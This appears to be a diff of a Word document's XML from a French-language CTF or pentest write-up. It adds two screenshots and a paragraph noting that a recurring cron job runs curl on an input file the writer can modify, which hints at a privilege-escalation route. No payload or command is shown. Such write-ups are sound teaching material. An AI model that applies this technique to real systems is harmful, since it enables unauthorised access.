+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1394460"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Les processus ci-dessus reviennent fréquemment, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">si on analyse, on devine vite une tache cron qui execute curl sur </w:t>
+      </w:r>
+      <w:r>
+        <w:t>le fichier input</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pour en faire un report, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>input qui est modifiable par nos soin.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
     <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="707A92E5" wp14:editId="4E6FD4C4">
+            <wp:extent cx="5760720" cy="1880235"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="17" name="Image 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1880235"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
